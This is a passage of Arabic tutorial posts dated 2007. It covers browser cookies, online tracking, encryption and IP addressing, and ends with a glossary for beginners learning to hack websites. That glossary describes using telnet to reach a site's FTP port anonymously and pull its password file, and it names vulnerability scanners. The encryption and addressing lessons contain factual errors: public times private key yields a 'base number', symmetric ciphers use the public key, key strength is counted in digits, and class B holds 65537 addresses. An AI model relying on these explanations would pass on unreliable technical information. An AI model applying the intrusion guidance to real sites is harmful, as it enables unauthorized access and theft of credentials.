ويقوم الموقع بتخزين الكعكة على قرصك الصلب في أحد الملفات مع العشرات أو المئات من الكعكات الاخرى التي قامت الموقع الأخرى بتخزينها من قبل دون أن تشعر أنت بذلك أو حتى الاستئذان منك! وفورا يتم اصدار رقم خاص ليميزك عن غيرك من الزوار وطبعا تبدأ الكعكة بأداء مهمتها التي أرسلت من أجلها ألا وهي جمع المعلومات وارسالها إلى مصدرها أو احدى شركات الجمع والتحليل للمعلومات وهي عادة شركات دعاية وإعلان وكلما قمت بزيارة الموقع يتم ارسال المعلومات وتجديد النسخة الموجودة لديهم ويقوم المتصفح لديك بعمل المهمة المطلوبة منه مالم تقم أنت بتعديل وضعها كما سنرى في المقالة القادمة

المعلومات التي تقوم بجمعها المواقع


تختلف المعلومات من كعكة ألى أخرى حسب البرمجة الأساسية لها ولكن يمكن إيجازها في النقاط التالية: - نوع الجهاز والمعالج المستخدم - معرف بروتوكول الإنترنت الخاص بك - طريقة اتصالك بالإنترنت وسرعة المودم - المواقع التي تقوم بزيارتها - صفحاتك المفضلة- ماذا تشتري من الشبكة- عما تبحث للشراء- ماهي الخدمات التي تبحث عنها- اهتماماتك على الشبكة وكم ساعة تقضي من الوقت على الشبكة- وكذلك اسمك وعنوانك البريدي وكافة المعلومات التي تقدمها للموقع وذلك أثناء تعبئة الاستمارات أو الاستبيانات- رقم بطاقة الإئتمان الخاصة بك وغيرها من المعلومات المفيدة


حقائق عن كعكة الإنترنت


هي ليست برامج بحد ذاتها ولكنها مجموعة من المعلومات المخزنه والمرتبة ولذلك هي لاتشكل تهديد أمني مباشر لجهازك وذلك لعدم مقدرتها على حمل أو نقل الفيروسات كما انها لا تستطيع جمع معلومات شخصية عنك غير التي تقوم أنت بنفسك بتقديمها للمواقع أثناء تعبئة الإستمارات أو نماذج التسجيل
الحقيقة الأخرى وهي أن هذه المعلومات لا يستطيع قراءتها والاستفادة منها سوى مصدرها لأنها عادة مشفرة إلا إذا كانت متعاقدة أو متعاونة من مواقع أخري لتبادل المعلومات فيما بينها
والحقيقة الأخري أن ليست كل الكعكات مخصصة لجمع المعلومات فهنالك كعكات تساعدك على اتمام عملية الشراء وأخرى تساعد على سرعة تحميل وتنزيل الصفحة عند تكرار الزيارة في المستقبل وذلك بتخزين الصور وغيرها من الملفات الكبيرة والتي عادة ما تأخذ وقت طويل لنقلها على الشبكة وهناك ما يساعد على تجنب تكرار الإعلانات وهناك ماهو مخصص للتعرف عليك وأداء التحية

كيف يمكنك ايقاف أو على الأقل ان تقلل من كمية الكعكات التي لا تتوقف عن ارسال المعلومات عنك؟


يمكنك ذلك بعدة طرق و أولها مسح تلك الكعكات المخزنة في قرصك الصلب بطريقة دورية ومسح تاريخ المواقع التي زرتها وكذلك يمكنك إزالة الملفات المؤقتة المتعلقة بالمتصفح الخاص بك. وهناك طرق اخرى للحيلولة دون تكرار زرع تلك الكعكات في قرصك الصلب وهي تعديل عمل المتصفح لديك أو شراء أحد البرامج المتخصصة في الحماية

دليل عملي على كيفية إزالة الكعكات من قرصك الصلب وكيفية منعها من التخزين مجددا


ننصح بطباعة الصفحة قبل الإستمرار

اولا : كيفية إزالة الكعكات من قرصك الصلب
قم بإغلاق متصفحك وإقطع الاتصال بالإنترنت وبعد ذلك انقر على مفتاح البداية وعندها تظهر لك قائمة البداية ، قم باختيار


Find "find Files or Folders"
type "cookies"
Look in "My computer"
press Find
تظهر لك جميع المجلدات تحت ذلك الاسم، قم يفتح كل مجلد وبعد ذلك

From Edit Menu "select all"
then from Edit Menu press "Delete"

كرر العملية نفسها مع جميع المجلدات بنفس الاسم، كما ننصح القيام بذلك كل فترة من الزمن
ملاحظة: قد يسألك الجهاز ... انها كعكات هل أنت واثق من رغبتك في إزالتها؟ أجب بنعم ولاعليك منها


ثانيا: لنقم بمسح الكعكات المخزنه لديك في الملف المؤقت الخاص بمتصفحك ، إذا كنت تستخدم انترنت إكسبلورر قم بالنقر على أيقونة المتصفح لديك مره واحدة بالزر الأيمن للفأرة وتظهر لك لائحة بها عدة خيارات، قم باختيار
Properties
then new window with different pages will open for you, select ""General""
وهي تنقسم إلى ثلاث أجزاء وفي الجزء الأوسط تجد
Temporary Internet Files
إذا كنت ترغب بمسح الملفات مباشرة دون الاطلاع عليها قم بالضغط على
Delete file
يظهر لك سؤال عن رغبتك في مسح الصفحات المحفوظة للاطلاع عليها دون الاتصال على الشبكة ، قم باختيارها إذا لا تريد الاحتفاظ بها وفي النهاية اضغط
OK
أما إذا كنت ترغب في مشاهدة الكعكات ومصادرها قم بالضغط على
setting
View Files or View Object

وبعدها يمكنك العودة لمسحها كما تم شرحه أعلاه
وأخيرا قم بمسح ملف تاريخ زياراتك للمواقع وذلك بالضغط على
Clear History

كيفية تجنب تخزين الكعكات على قرصك الصلب

يمكنك التحكم بمتصفحك وذلك بعدم السماح له بتخزين الكعكات على قرصك الصلب واليك الطريقة

بنفس الطريقة قم بالضغط على أيقونة المتصفح وذلك بالزر الأيمن من الفأرة و اختر خصائص

Properties , select Security
then press on costom level
وقم بالنزول بالصفحة حتى تجد
cookies

وبها الخيارات التالية

- Allow cookies that are stored on your computer
وتحت هذا الخيار قم باختيار
Disable
حتى تمنع تخزين الكعكات على قرصك الصلب
- allow persession cookies (not stored)

قم باختيار
enable
وهذا الاختيار يعطيك ميزة السماح للكعكات والعمل مؤقتا عند تصفحك للإنترنت وبالتالى الاستفادة من جميع مميزات المواقع ولكن دون السماح بتخزين الكعكة حيث أنك وبمجرد اغلاق المتصفح سوف تتخلص من الكعكات ، أما إذا رغبت بعدم السماح لهم مطلقا قم باختيار
Disable
ولكن سوف لن تستطيع مشاهدة بعص الصور أو التمتع بجميع امكاتيات الصفحة
للانتهاء قم بالضغط على
OK
ولتهيئة المتصفح لديك للقيام بمسح الكعكات في كل مرة بعد انتهاءك من التصفح إذهب الى
Advanced

وعليك بالنزول بالصفحة حتى تجد
security
وقم باختيار
Empty Temporary internet files folder when browser is closed, then press OK

وطبعا لا تنسى أن تقوم بالتخلص وافراغ سلة المهملات من الكعكات التي قمت بمسحها من الملفات، لأنها وإن انتقلت إلى سلة المهملات على سطح المكتب إلا أنها تقوم بدورها مالم تتخلص نهائيا منها

Linux Root
, Tue, 26 Jun 2007 23:27:32 +0200
الدرس الخامس والعشرين

الكيفية التي يتم بها جمع المعلومات عنك من قبل المواقع التي تزورها


تقوم معظم المواقع التي تزورها بجمع المعلومات عنك أنت وبقية المستخدمين للشبكة باستخدام عدة طرق وهي



كعكة الإنترنت
ولقد تم شرحة سابقا في هذا الموقع

بقة الإنترنت: وتعرف كذلك باسم (كـلير جيف) وهي عبارة عن صور (جرافيك) يتم ادخالها من ضمن لغة الترميز لصفحة الإنترنت أو الرسالة الإلكترونية وهذه الصور صغيرة جدا بالحجم وتبلغ تقريبا 1 في 1 بيكسل وتستقر في الشاشة الخلفية ولا يستطيع ملاحظتها المستخدم

متابعة مستخدم الإنترنت عن طريق برامج معينة مثل : برنامج جافا سكريبت وهي لغة برمجية تستخدم في معظم المواقع المتطورة و كذلك يمكن اساءة استخدام برنامج جافا ابليتس وهي من البرامج الخطيرة خاصة إذا ما قام الموقع أو أي شخص بسوء استخدامها وذلك لأنها برامج صغيرة تنزل إلى جهازك وتبدأ بالعمل تلقائيا وتعمل بالخفاء دون علمك و هي عادة تجدها مستخدمة لدى بعض مواقع الدردشة المباشرة نظرا لامكاناتها المتطورة ولذلك وجب علينا تحذيرك من مواقع الدردشة


أهم الفروقات بينهم


كعكة الإنترنت والجافا سكريبت والجافا ابليت يمكنك التحكم بمتصفحك لمنعهم جميعا أو السماح لهم أو الاختيار في مستوى الأمان بهم ، أما بقة الإنترنت فهي تزرع مباشرة في الصفحة أو الرسالة الإلكترونية وتبدأ بعملها مباشرة حال فتحك للصفحة أو الرسالة ولا يمكنك التحكم بها

طبيعة المعلومات التي يتم جمعها عنك User Data Collection


أول شئ تقوم به المواقع هو الحصول على رقم بروتوكول الإنترنت الخاص بك(وهو مميز لك تماما مثلما يميزك رقم هاتفك المنزلي أو الجوال عندما يظهر رقمك في أجهزة الكاشف) ، ومن ثم يتم اصدار رقم خاص بك لتعريفك ومتابعتك داخل مواقعهم كلما تنقلت من صفحة الى أخرى أو من موقع الى اخر وبعد ذلك يتم التعرف على جهازك وسرعة المعالج لديك ونظام التشغيل الذي تستخدمه ونوعية المتصفح لديك والقيام بتسجيل جميع المواقع والصفحات التي ترددت عليها ويتم رصد توجهاتك وإحتياجاتك من الخدمات أو السلع وصفحاتك المفضلة وعندما تقوم بتعبئة أي استمارة أو طلب يتم تخزين وحفظ المعلومات من اسم وتاريخ ميلاد وعنوان بريدي أو صندوق بريد... الخ

ماذا تستفيد هذه المواقع من جمع كل هذه المعلومات؟



ببساطه شديدة إنها كنز لكل موقع بحيث يتم تحليل كل المعلومات وتصنيفها وعمل الاحصاءات التي تفيد الموقع من جميع النواحي الادارية والتخطيطية والاعلانية كما يمكن بيع أو تبادل هذه المعلومات سواء أكانت معلومات خام أو معلومات محلله و جاهزة وتكمن أهمية هذه المعلومات في فائدتها العظيمة في سوق الدعاية والإعلان وبنوك المعلومات بحيث لا يتم ارسال الاعلانات أو تقديم الخدمات إلا لمن سوف يهتم بها ويقرؤها وتسمى ب الاعلانات الموجهه ولهذا السبب يعتبر سوق الاعلان في الإنترنت أكثر فائدة وفعالية من الجرائد والمجلات والتلفزيون حيث لايمكن في هذه الطرق التقليدية ضمان قراءتها أو متابعة تأثيرها أو تفاعل الجمهور معها أما في الإنترنت فإن المعلن سوف يعلم من و متى تمت قراءة الإعلان أو فتح الرسالة الإلكترونية أو هل تم تجاهلها

كما يتم رصد السلع والخدمات التي قمت بشرائها مؤخرا بحيث يتم توجيه السلع أو الخدمات المتعلقة بما اشتريت فمثلا لو قمت بشراء جهاز كمبيوتر من الإنترنت فهذا يعني أن عليهم توجيه الإعلانات الخاصة بملحقات الكمبيوتر كالطابعات والأحبار الخاصة بها لأنك هنا عميل مستقبلي لهم ولابد لك من شراء شئ جديد من الملحقات طالما أنك قمت بشراء جهاز جديد

نعم عليك بالقلق من هذا التتبع



حتى وقت قريب كانت الشركات والمواقع تقوم بجمع المعلومات اعتمادا على عنوان بروتوكول الإنترنت (أي بي) وذلك دون معرفتك أنت شخصيا أما الان وبعد تطور التكنولوجيا التي تسمح لهم بأكثر من ذلك فإن العديد من الشركات والهيئات وبنوك المعلومات قادرة على تحديد رقم هاتفك الذي تتصل منه وعنوانك وكذلك تسجيل كل ما تقوم بكتابته أو تستقبله في غرف الدردشة أو الرسائل الإلكترونية وجمعها في ملف واحد خاص بك وطبعا يمكنهم بيع هذه المعلومات لشركات التسويق والدعاية أو الجهات الحكومية الأخرى في العالم

كيفية الحد من هذا التتبع


نتيجة لما تقوم به المواقع من تتبع للأفراد على شبكة الإنترنت قامت صناعة كاملة تهتم بهذا الجانب لتقديم الحلول ونشأت شركات متخصصة في تقديم البرامج التي تحمي أمنك وخصوصيتك وأصبحت الشركات التي تطور المتصفحات تتنافس في سد الثغرات الأمنية وزيادة تحكم المستخدم بها لأن المستخدم أصبح أكثر وعيا عن السابق كما أن هنالك عدة شركات تقوم بتقديم خدمة التصفح الحر بحيث تدخل إلى الشبكة تحت مظلتهم وتستطيع استخدام عنوان بروتوكول الإنترنت (أي بي)الخاص بهم ولا يظهر عنوانك أنت وكذلك يتم تخزين كل البرامج والكعكات التي يستخدمها المتتبع في أجهزتهم ولا تتأثر أنت بها وبذلك تتجنب التتبع وقريبا
سوف نقدم لك لائحة بأسماء هذه المواقع والشركات

كما لانتسى قراءة المقالة الموجودة بهذا الموقع عن كعكة الإنترنت وكيفية التحكم بها والتخلص منها لأنها أوسع الطرق التي يتم استخدامها في التتبع ، كما ننصح بقراءة الصفحة الخاصة ب أمن شبكة الإنترنت وذلك للاستفادة من طريقة تعديل درجة الأمان في متصفحك وغيرها من التعليمات المهمة

Linux Root
, Tue, 26 Jun 2007 23:29:10 +0200
الدرس السادس والعشرين


كل ما تود معرفته عن التشـفير
التشفير



هي عملية الحفاظ على سرية المعلومات (الثابت منها و المتحرك) باستخدام برامج لها القدرة على تحويل وترجمة تلك المعلومات الى رموز بحيث إذا ما تم الوصول إليها من قبل أشخاص غير مخول لهم بذلك لا يستطيعون فهم أي شئ لأن ما يظهر لهم هو خليط من الرموز والأرقام و الحروف الغير مفهومة


ولقد شهدت أسواق هذه البرامج انتعاشا مذهلا بعد أن سمحت السلطات الأمريكية للشركات التجارية المتخصصة ببيع هذه التقنية للجمهور و عامة الناس بعدما كانت محصورة للاستخدامات العسكرية والحكومية لسنوات طويلة ولقد اتخذت الحكومة الأمريكية هذا القرار في سبيل دعم الجانب الأمني لمجال التجارة الإلكترونية علما بأنها وحتى وقت قريب جدا لم تسمح بتصدير هذه التكنولوجيا إلى خارج الولايات المتحدة، خاصة للتي تزيد قوة تشفيرها عن 56 بت


هل أنت بحاجة لها؟
الجواب بالتأكيد نعم فلكل فرد و شركة أو هيئه تجارية خصوصيات و أسرار و معلومات هامة جدا لا يجب أن يطلع عليها أحد ، كما أنك اليوم لا تستطيع الاستغناء عن خدمات متوفرة في الإنترنت مثل البريد الإلكتروني و التسوق عبر مواقع التجارة الإلكترونية



فكرة عامة و مبسطة عن التشفير



على اختلاف أنواع و أشكال البرامج المتخصصة في هذا المجال إلا أنها جميعا تتشارك في القاعدة أو الأساس وهي مبنية على مفهوم بسيط جدا وهو أن كل رقم أو معلومة مشفرة تحتاج لفكها و إعادتها الى وضعها الأصلي الى ثلاث عناصر مجتمعة مع بعضها البعض و لنفرض انها ( س ، ص ، ع) أما في حالة معرفة قيمة واحدة فقط من هذه العناصر و بقاء الاثنتين الباقيتين مجهولتين فإنك سوف تجد نفسك في دوامة الاحتمالات والتخمين للوصول إلى القيم الصحيحة لهذين العنصرين المجهولين اللازمين لاكمال الحلقة و فك الشفرة وعلى هذا الأساس علينا التعرف على ثلاث مصطلحات لفهم هذه التكنولوجيا : المفتاح العام ، المفتاح الخاص ، و الرقم الأساس حيث أن أي معلومة يتم تشفيرها لا يمكن الاطلاع عليها صحيحة وكاملة إلا بوجود هذه المفاتيح الثلاثة مجتمعة


ويتم تطبيق هذا المبدأ في مجال التشفير كالتالى


يتم إصدار رقم الأساس عن طريق البرنامج المتخصص أو احد الهيئات المستقلة و المتخصصة في إصدار هذه الأرقام وهو مايعرف ب
(CA) Certificate Authority
بحيث يكون لكل مستخدم رقم أساس وهو (ع) و يتم تقسيم هذا الرقم الى مجموعتين (س) و هو ما يعرف بالمفتاح العام و (ص) هو ما يعرف بالمفتاح الخاص ، بحيث اذا قمنا بعملية ضرب س في ص يكون الناتح هو (ع) الرقم الأساس وهو الرقم اللازم لإعادة الملفات و المعلومات الى وضعها الأصلي قبل التشفير وطبعا هذا الرقم محمي ومشفر بقوة ولا يمكن الوصول اليه


المفتاح العام(Public Key)
هو الرقم الذي يتم تداولة و نشره بين بقية المستخدمين لتشفير أي معلومات أو رسالة الكترونية مخصصة لك و يعتبر رقمك العام اساس عملية التشفير و لا يستطيع أحد فك رموز تلك المعلومة غيرك انت لأنها تحتاج الى الرقم السري و ليكن هو المفتاح الخاص بك لإكمال العملية الحسابية والوصول الى الرقم الأساس وبالتالي فتح الملفات مرة أخرى
المفتاح الخاص : هو النصف الاَخر المكمل للمفتاح العام للوصول الى الرقم الأساس واعادة المعلومات المشفرة الى وضعها الطبيعي قبل التشفير ، و هذا المفتاح هو الذي يميز كل شخص عن غيره من المستخدمين ويكون بمثابة هوية الكترونية تمكن صاحبها من فك أي معلومة مشفرة مرسله اليه على أساس رقمه العام ولذلك يجب عليك الاحتفاظ بالمفتاح الخاص سرا وهذ ما يعرف ب
Private Key


و بهذه الطريقة لا يستطيع أحد فك الشفرات وقراءة المعلومات المحمية بهذه الطريقة دون اكتمال الحلقة و التي لا تتم إلا بمعرفة القيمة الصحيحة للمفتاح العام و المفتاح الخاص



أنواع تكنولوجيا التشفير



هنالك نوعين من التكنولوجيا المستخدمة في التشفير وهي التشفير المتناظر والتشفير الغير متناظر
Symmetric Algorithms and ASymmetric Algorithms
و الفرق بينهم بسيط جدا ولكنه مهم جدا في مستوى ودرجة الأمن حيث أن التشفير المتناظر يتم بتشفير الرسالة أو المعلومات باستخدام الرقم العام وكذلك في نفس الوقت يتم فك الشفرة و ترجمة المعلومات إلى وضعها الأصلي بإستخدام نفس الرقم العام. ولذلك لو حصل و أن شخص اخر يعرف هذا الرقم أو حصل عليه من الدليل العام فإنه قادر على فك الشفرة و قراءة تلك الرسالة أو المعلومة ، أما إذا ما تم تشفير المعلومات باسلوب (الغير متناظر) فإن المعلومات يتم تشفيرها بالرقم العام ولكن لا يمكن فك الشفرة و الوصول إلى تلك المعلومات الا بالمفتاح الخاص لصاحب ذلك المفتاح العام الذي تم على أساسه عملية التشفير
وإذا حصل وأنك فرغت من قراءة السطور السابقة و لم تفهم شئ مما كتبناه فاسمحوا لنا بشرحها بطريقة أخرى للتسهيل ، تخيل بأنك تقوم بالاتصال هاتفيا بأحد أصدقاؤك وعندما تدخل رقم هاتفه (الرقم العام) ويبدأ هاتفه بالرنين ولكن ذلك الصديق لا يرد على مكالمتك فيرد عليك جهاز إجابة و تترك له رسالة صوتية في ذلك الجهاز . و الان لنتخيل بأنك قمت بحماية (تشفير) تلك الرسالة برقم سري و لا يستطيع أحد الاستماع إلى تلك الرسالة إلا بإدخال ذلك الرقم السري. فإن كان صديقك هذا قد اتفق معك على اختيار الرقم السري هو نفس رقم هاتفك العام فهذا ما يسمى بطريقة التشفير المتناظر لأن المفتاح العام = الرقم السري أما لو قام ذلك الصديق ببرمجة التشفير لطلب الرقم السري الخاص بك (رقم اخر لا يعرفه أحد غيرك) فهذا مايعرف بالتشفير الغير متناظر لأن المفتاح العام لا يساوي الرقم السري


أشهر طرق التشفير المتناظر
Blowfish, Digital Encryption Standard (DES), Tiny Encryption Algorithm(TEA), Triple DES, and International Data Encryption.
أشهر طرق التشفير الغير متناظر
Pretty Good Privacy(PGP) and Reivest,shamir&Aselman(RSA)



قوة التشفير


تعتمد على عدد الخانات المكونة لكل رقم و تقاس ب البت فمثلا اذا كان الرقم مكون من 40 خانة فإن القوة ستكون 40 بت إذا كان الرقم عبارة عن 56 خانة تكون قوة التشفير 56 بت وهكذا. علما بأن التكنولوجيا المتوفرة في هذا المجال يمكن أن توفر قوة تشفير تصل إلى أكثر من 3000 بت ولكن لم تسمح الحكومة الأمريكية حتى الان بتداول قوة تشفير أكثر من 128 بت لأنه كاف جدا لحماية التجارة الإلكترونية و جدير بالذكر أن الوقت اللازم ليتمكن أحد لصوص الإنترنت لفك شفرة بقوة 56 بت هو 22 ساعة و خمسة عشر دقيقة ، أما الوقت اللازم لفك شفرة بقوة 128 بت باستخدام التكنولوجيا الحالية لفك الشفرات فهو 2 ترليون سنة!! لأن اللص في حالة 56 بت بحاجة لتجربة 72 كوادرليون من الإحتمالات (يعني رقم و أمامه 15 صفر) أما في قوة 128 فإن الإحتمالات المطلوبة للتجربة تصل الى عدد فلكي وهو 340 انديسليون (يعني رقم وأمامه 36 صفر) ولذلك لم نسمع أبدا بأن معلومة تم تشفيرها بهذه القوة قد تم فكها من قبل هؤلاء اللصوص المحترفين و نحن لا نعتقد بأن أحد يمكنه فعل ذلك على الأقل في المستقبل القريب أو المنظور ولذلك تسوق على شبكة الإنترنت وأنت مطمئن البال بشرط التأكد من قوة التشفير المستخدمة من قبل الموقع الذي تود الشراء منه و كذلك التأكد من قوة التشفير في متصفحك ولمزيد من المعلومات نرجوا مراجعة صفحة الأمن لكي تتعرف على قوة التشفير في متصفحك و مقالة أمن التجارة الإلكترونية حيث نتطرق الى موضوع
SSL (Secure Sockets Layer Technology)
تكنولوجيا الفتحات الاَمنه متعددة الطبقات

Linux Root
, Tue, 26 Jun 2007 23:34:01 +0200
الدرس السابع والعشرين

تعرف على عنوان بروتوكول الإنترنت
Understanding IP Addresses
إذا كنت تملك جهاز هاتف به خاصية الإتصال السريع أو هاتف جوال بخاصية حفظ الأسماء والأرقام فإنك قد فهمت ما أود الكتابة عنه اليوم ! هل فكرت يوما أن تفهم ماهو عنوان بروتوكول الإنترنت الخاص بك ؟ لا عليك فالحكاية سهله جدا وهذا البروتوكول مبني على حقيقة واقعية و هي أننا نستطيع التعامل مع الأسماء ونستطيع تذكرها أكثر من حفظ و تذكر الأرقام خاصة إذا كانت الأرقام طويلة ويصعب تذكرها ولذلك فنحن نلجأ الى تخزين الأسماء في أجهزة الهاتف بدلا من حفظ الأرقام ! ولكنك قد تتساءل مادخل هذه بتلك ؟ وحتى تستطيع فهم الموضوع لابد لنا من ذكر الخلفية التاريخية لها


قام المسؤولون عن تطوير شبكة الإنترنت منذ بداية الستينات (أي منذ أن كانت الشبكة مقتصرة على بعض مراكز البحث العلمي التابعة للجامعات الأمريكية ووزارة الدفاع الأمريكية) بالإستفادة من نظام الهاتف في اعتماد طريقةالترقيم في تمييز كل مستخدم وتحديد البلد والمدينة والمنطقة التى يتصل منها والعكس صحيح أي انك لو تعرف اسم الشخص تستطيع الحصول على رقمه الهاتفي بالإتصال على دليل الإستعلامات ، و نتيجة لإعتماد انظمة الهاتف على هذه الطريقة أصبح يسهل إرسال وإستقبال المكالمات من أو الى ذلك الجهاز او المشترك في خدمة الهاتف. و في مجال الإنترنت فلقد تم الإعتماد على نفس طريقة الترقيم في خدمة الهاتف حتى يتم تمييز أي جهاز في الدنيا مرتبط بشبكة الإنترنت وبذلك تسهل عملية إرسال أو إستقبال المعلومات منه و يتمكن الناس من تمييز كل مستخدم للإنترنت بمعرفة عنوان الأي بي الخاص به ولذلك يمكن تشبيهه عنوان الأي بي برقم الهاتف. و في مجال الإنترنت اذا ما تم معرفة عنوان بروتوكول الإنترنت (الأي بي) يمكن الوصول الى اسم صاحب ذلك العنوان ، ولكي يمكن تطبيق هذا الشئ كان لا بد لهم من الوصول الى نظام موحد للشبكة يمكنهم من تطبيق هذا النظام على الإنترنت على
أولا : أن يكون لهذا النظام الموحد قدرة على ازالة الحواجز الناتجة عن الإختلافات في مواصفات واشكال و أنواع أجهزة الكمبيوتر المرتبطة مع بعضها البعض بواسطة الشبكة
ثانيا : عدم تأثر هذا النظام بالتطورات التي تطرأ على التكنولوجيا المرتبطة بصناعة أجهزة الحاسب
ثالثا : أن يقوم هذا النظام بإرسال و إستقبال المعلومات على شكل حزم صغيرة من المعلومات تكون قادرة على حرية التنقل والحركة من عقدة الى اخرى في الشبكة دون الإعتماد على الإتصال المفتوح و الدائم بين جهازين كما هو الحال في الهاتف وهذ المطلب كان لأسباب عسكرية وتلبية لخاصية عدم الإعتماد على خط تنقل واحد للمعلومات تفاديا لإنقطاع خدمة تراسل المعلومات في حال
وجود دمار أو خلل على احد فروع الشبكة
وعلى هذه الخلفية تم تطوير نظامين وهما المعروفين ب
(TCP) Transmission Control Protocol and (IP) Internet protocol

TCP


و مهمة هذا البروتوكول هوالتأكد من أن حزمة المعلومات التي أرسلت من نقطة (عقدة) الى أخرى قد وصلت كاملة أم لا وكذلك يقوم هذا البروتوكول بتنبيه الجهاز المرسل في حالة تعثر وصول المعلومة الى وجهتها المطلوبة
IP


و هو نظام التوجيه وهي مسؤولة عن تحديد العقد و المسارات التي تسلكها حزم المعلومات للوصول الى الجهاز الهدف

ولقد قام المطورون بعد ذلك بتطوير هذين النظامين و دمجهما مع بعض لتتماشى مع مجموعة من المواصفات الجديدة لتقوم بتقسيم حزم المعلومات الى حزم أصغر و هو ما يعرف ب
FRAMES
للتقليل من اختناقات الشبكة قاموا بتسمية البروتوكول
TCP/IP

ماذا خلف تلك الأسماء؟


سنحاول في هذه المقالة ان نبسط المسألة على قدر المستطاع ونحاول بقدر المستطاع تجنب الحسابات خاصة بين الأنظمة العددية
في الحقيقة ان كل اسم موقع أو اسم مقدم خدمة أو اسم مستخدم مشترك في الإنترنت هو في الواقع عبارة عن مجموعة من الارقام الثنائية (صفر و واحد) و يتكون عنوان بروتوكول الإنترنت من 32 خانة من الأرقام الثنائية وهو ما يعبر عنه ب 32 بت ، وإذا علمنا ان كل 8 بت تكون لنا ما بعرف بالبايت وهي التي تمثل لنا الحروف و الأرقام ، أي كل بايت يمكن أن يمثل حرف هجائي واحد أو أي عدد مكون من الارقام من صفر الى تسعة(النظام العشري) ولقد قام المطورون لشبكة الإنترنت بإعتماد الأرقام من صفر الى مائتين وخمس و خمسين 255 وعلى هذا الأساس فإنه يمكن لنا قسمة 32 بت على ثمانية و يكون الناتج هو 4 بايت أي أنهم وبإختصار شديد وضعوا أساس هذه الأرقام على أساس أربعة حقول من الأرقام تفصل بينهم نقطة و هذه الأرقام تتراوح مابين العدد صفر و 255 و مثال على ذلك نكتب لكم هذا الرقم كنموذج
208.148.28.60
63.209.3.102
فإذا قمت الان بكتابة رسالة الكترونية ووضعت عنوان صديقك أو طلبت زيارة موقع على الشبكة وذلك بكتابة اسم الموقع يقوم المتصفح لديك بإرسال هذا الطلب على شكل حزمة من المعلومات( وبها عنوان بروتوكول الإنترنت الخاص بك) مباشرة الى أحد أجهزة مقدم الخدمة لك و من ثم الى شبكة الإنترنت و حينها يقوم الخادم الخاص لإسم النطاق
DOMIAN NAME SERVER
بترجمة ما قمت بطباعته كإسم الموقع أو عنوان صديقك البريدي الى الرقم الثنائي الأساسي و بالتالي يرسل تلك المعلومة أو الطلب

أنواع و فئات العناوين


لا نود الدخول في تفاصيل هذه الأنواع و الغوص في اعماقها ولكن نكتفي بلمحة بسيطة عنها
تنقسم عناوين بروتوكول الإنترنت الى ثلاث أقسام و يتفرع من كل منها عدة اقسام اخرى ونكتفي بذكر المهم منها بإختصار شديد و هي

Class based addressing العناوين المعتمدة على التصنيف
وهي ثلاث فئات ، كلها تعتمد على نفس الأساس وهو اثنين وثلاثين بت منقسمة الى اربعة مجموعات من الأرقام العشرية وتفصل بينهم نقطة ولكن تختلف هذه الفئات في طريقة استخدام الأرقام العشرية

الفئة الأولى : وهي مخصصة للشركات الكبيرة و في هذه الفئة يتم استخدام أول مجموعة من الارقام لتحديد هوية الشبكة و اخر ثلاث ارقام لتحديد هوية المستضيف و تم تخصيص الأرقام من
000.000.000.000 -to- 127.255.255.255
لهذه الفئة مما يؤدي الى امكانية الحصول على 16777216 عنوان مختلف من هذه الفئة

الفئة الثانية : وهي مخصصة للشركات والهيئات المتوسطه و في هذه الفئة يتم استخدام أول مجموعتين من الأرقام لتعريف الشبكة و اخر مجموعتين من الأرقام لتحديد هوية المستضيف و تم تخصيص الأرقام من
128.000.000.000 -TO- 191.255.255.255
لهذه الفئة مما يؤدي الى امكانية الحصول على 65537 عنوان مختلف

الفئة الثالثة : و هي مخصصة للشركات الصغيرة و في هذه الفئة يتم استخدام أول ثلاث مجموعات من الأرقام لتحديد هوية الشبكة و اخر مجموعة ارقام لتحديد هوية المستضيف و تم تخصيص الأرقام من
192.000.000.000 -TO- 223.255.255.255
لهذه الفئة مما يؤدي الى امكانية الحصول على 256 عنوان مختلف
وهناك فئتين (رابعة وخامسة) ولكن ليست منتشرة و مازالت تحت التطوير

Subnettingالتفريع الشبكي
و هي مخصصة للشركات الصغيرة جدا و يتم فيها مشاركة عدة شركات و تقاسمها لنفس الشبكة وبذلك تتشارك عدة شبكات صغيرة في عنوان شبكة واحدة من الفئة الثالثة على ان يتم تخصيص أحد الثلاث مجموعات الرقمية الأولى لواحدة من تلك الشركات المشاركة

Classless Interdomain Routingالعناوين دون التصنف
و هي مخصصة لكبار مزودي الخدمة وهو ما يعرف ب
SUPER NETTING
و تعتمد هذه الطريقة على استخدام مئات من العناوين من الفئة الثالثة و تكوين خليط من الأرقام المرتبطة مع بعضها منطقيا و هو ما يعرف بطريقة
(Variable Length Subnetting)
وهي لا تختلف عن الفئات السابقة سوى في وجود علامة (/) بعد العنوان الأصلي و يليها رقم يرمز الى هوية الشبكة

Linux Root
, Tue, 26 Jun 2007 23:39:46 +0200
الدرس الثامن والعشرون
مصطلحات مهمة للمبتدئين في تعلم اختراق المواقع
لقد اعددت هذا الملف لاخواني المبتدئين في تعلم طرق اختراق المواقع ، فقد
تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد لا يفهمونها ،
و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم . فالله الموفق.
================================================== =====================


تلنت (Telnet):- و هو برنامج صغير موجود في الويندوز . و هو يعمل ككلاينت
أو وضعيته تكون دائما كزبون . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر
عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
Anonymous Mode لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت.
------------------------------------------------------------------------

برامج السكان أو Scanner:- و هي برامج موجودة للمسح على المواقع و كشف
ثغراتهاإن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة
تحتوي على الثغرات أو الاكسبلويت (Exploits) التي يتم تطبيقها على الموقع
لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
هذه البرامج، برنامج Shadow Security Scanner و Stealth و Omran Fast
Scanner ، الخ .
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ IIS و منها برامج المسح
على ثغرات السي جي اي فقط CGI و ما الى ذلك .
-----------------------------------------------------------------------

